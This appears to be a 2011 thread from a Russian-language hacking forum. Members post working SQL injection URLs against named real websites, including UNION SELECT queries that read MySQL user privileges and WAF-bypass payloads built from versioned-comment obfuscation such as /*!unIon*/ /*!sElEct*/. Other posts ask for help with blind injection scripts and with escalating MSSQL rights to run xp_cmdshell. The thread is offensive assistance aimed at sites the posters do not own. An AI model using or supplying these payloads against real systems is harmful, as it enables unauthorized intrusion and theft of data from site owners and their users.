 |
|
07.07.2011, 13:58
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от None
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,file_priv,3,4,5,6,7+from+mysql.us %20er+where+user=0x67625F6D69726F626F6577--+
Тогда уж так:
Сообщение от None
http://www.miroboew-kazan.ru/news.php?id=-3+union+select+1,file_priv,3,4,5,6,7+from+mysql.us er+where+user=user()--+
|
|
|
07.07.2011, 13:59
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
С нами:
8285366
Репутация:
62
|
|
Сообщение от XAMEHA
Тогда уж так:
просто я извращенец
|
|
|
|
08.07.2011, 00:35
|
|
Новичок
Регистрация: 07.07.2011
Сообщений: 1
С нами:
7815926
Репутация:
0
|
|
У меня вопрос по Sql-injection. Есть вроде бы инъекция вот здесь: http://today.od.ua/showphoto/876
С помощью order+by можно узнать количество полей.А дальше с union select запросы не проходят,выдает ошибку,на проверки типа +and+1=1 то же самое. Помогите пожалуйста разобраться с данной проблемой.
|
|
|
|
08.07.2011, 02:02
|
|
Новичок
Регистрация: 23.02.2010
Сообщений: 3
С нами:
8534431
Репутация:
76
|
|
Сообщение от Sc0rpi0n
Подскажите плиз нормальный пример скрипта на ПХП для бинарного поиска mysql inj
Помогите плиз
|
|
|
|
08.07.2011, 03:07
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
С нами:
8762549
Репутация:
1069
|
|
|
|
|
|
08.07.2011, 09:34
|
|
Новичок
Регистрация: 28.11.2010
Сообщений: 0
С нами:
8134166
Репутация:
0
|
|
Приветствую, есть MsSQL сервер, есть доступ к базе данных(не через инъекцию).
Все бы хорошо, но:
Сообщение от None
EXECUTE permission denied on object 'xp_cmdshell'
Как можно повысить себе права? Можте кто-то уже делал запрос?
Читал мануалы по мсскл, но не вкурил =( |
|
|
|
08.07.2011, 15:39
|
|
Новичок
Регистрация: 23.02.2010
Сообщений: 3
С нами:
8534431
Репутация:
76
|
|
Помогите пожалуйсто обойти WAF http://www.melonfire.com/community/columns/trog/print.php?id=263
|
|
|
|
08.07.2011, 16:24
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от Sc0rpi0n
Помогите пожалуйсто обойти WAF http://www.melonfire.com/community/columns/trog/print.php?id=263
http://www.melonfire.com/community/columns/trog/print.php?id=263%20and%201=2%20/*!unIon*/%20/*!sElEct*/%201,2,3,4,5,6+--+
|
|
|
|
09.07.2011, 00:09
|
|
Новичок
Регистрация: 23.02.2010
Сообщений: 3
С нами:
8534431
Репутация:
76
|
|
Помогите плиз опять с WAF. Теперь нужно понять как выводить из таблиц)
Код:
http://ironmiketyson.ru/article_read.php?id=-1/*!unIon*/ /*!sElEct*/ 1,version(),3,4/*!from*/ /*information_schema.tables+--+
|
|
|
|
09.07.2011, 00:13
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от Sc0rpi0n
Помогите плиз опять с WAF. Теперь нужно понять как выводить из таблиц)
Код:
http://ironmiketyson.ru/article_read.php?id=-1/*!unIon*/ /*!sElEct*/ 1,version(),3,4/*!from*/ /*information_schema.tables+--+
Код:
http://ironmiketyson.ru/article_read.php?id=(0)union(select(1),2,3,4)--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
